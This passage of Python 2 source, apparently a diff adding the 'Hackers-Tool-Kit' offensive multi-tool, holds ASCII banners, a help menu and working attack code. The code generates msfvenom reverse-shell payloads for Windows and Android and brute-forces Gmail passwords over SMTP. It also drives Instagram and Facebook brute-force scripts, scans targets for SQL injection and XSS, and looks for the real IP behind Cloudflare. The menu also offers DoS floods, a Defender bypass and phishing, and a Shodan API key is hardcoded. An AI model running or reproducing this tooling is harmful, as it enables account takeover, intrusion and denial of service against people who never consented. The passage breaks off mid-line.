░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') +def mainbanner20(): + print """ + + + ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ + ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ +██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ +╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ + ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ + ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ + Created by @tuf_unkn0wn type ? for help + + """.decode('utf-8') +def mainbanner21(): + os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") + +def mainbanner22(): + print """{0} + + ██ ██ ██ ██ ███ + ██ ███ █████████ ███ ▄█ █▀ + ███ ███ ███ ███▐██▀ + ███▄▄▄▄███ ██{1} █████▀ + ██ ▀▀▀▀███ ███ ████▄ + ███ ███ ███ ███▐██▄ + ███ ██ ██ ██ ▀█ █▄ + {2} ███ ███ █ ███ ███ + + """.decode('utf-8').format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,22) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() + if num == 20: + mainbanner20() + if num == 21: + mainbanner21() + if num == 22: + mainbanner22() + +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +reboot : reboot hackers-tool-kit +update : update the hackers-tool-kit +clear : clears screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +anon : make yourself anonymous [\033[33manon on \033[0m|\033[33m anon off\033[0m] +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [\033[33m wifi hack \033[0m] +aircrack: aircrack-ng automated [\033[33m wifi hack \033[0m] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +specscan: specific info gather on a host +info : info gather on a host [\033[33mincludes port scan\033[0m]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [\033[33mproxychains setup required\033[0m] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (\033[33minfo gathering tool\033[0m) +nano : open nano text editor +compilec: compile a c file +dnsspoof: dns spoofing [\033[33mtype dnsspoofall to spoof entire subnet\033[0m] +htk-lite: run a lighter version of hackers-tool-kit +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#ANONYMOUS START# +#---------------# +def anonon(): + print "\033[93m------------------------\033[0m" + print "\nSTARTING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system('proxychains python htk.py --quickrun') + + +def anonoff(): + print "\033[93m------------------------\033[0m" + print "\nSTOPPING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + sys.exit() + reboot() +#ANONYMOUS END# +#-------------# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("MODE> ") + ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#SPEC INFO SCAN START# +#--------------------# +def specscan(): + print """\033[1m +Scans Available:\033[0m + +1: simple nmap portscan + +2: show document info of target with curl + +3: nmap OS detection, version detection, script scanning, and traceroute scan + +4: nmap dns bruteforce + +5: get a hosts ip address + +6: check if a host is online + +7: who-is lookup + +8: dns-lookup + +9: get a hosts source code + +10: web application firewall scanner + +11: run a ssl scan + +12: find the location of a ip address + +13: reverse ip lookup + +14: host search + +15: reverse dns + +16: find shared dns + +17: cloudflare bypass + +18: sslscan + +19: directory scan / bruteforce + +20: nikto scan [this might take awhile to finish] + +go back: go back to main menu + + """ + print "Type a number then your target Ex: 5 www.pornhub.com\n" + j = False + while not j: + try: + option, target = raw_input("\033[1mScan:\033[0m ").split() + if option == "1": + os.system("nmap {0}".format(target)) + if option == "2": + os.system("curl -I {0}".format(target)) + if option == "3": + os.system("nmap -A {0}".format(target)) + if option == "4": + os.system("nmap --script dns-brute {0}".format(target)) + if option == "5": + ip = socket.gethostbyname(target) + print """ + Host: {0} + IP: {1} + """.format(target, ip) + if option == "6": + ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + if option == "7": + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + if option == "8": + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + if option == "9": + os.system("curl {0}".format(target)) + if option == "10": + os.system("wafw00f {0}".format(target)) + if option == "11": + os.system("sslscan {0}".format(target)) + if option == "12": + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + if option == "13": + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + if option == "14": + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + if option == "15": + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + if option == "16": + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + if option == "17": + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + if option == "18": + a = 'sslscan {0}'.format(target) + os.system(a) + if option == "19": + ht = raw_input("HTTP or HTTPS: 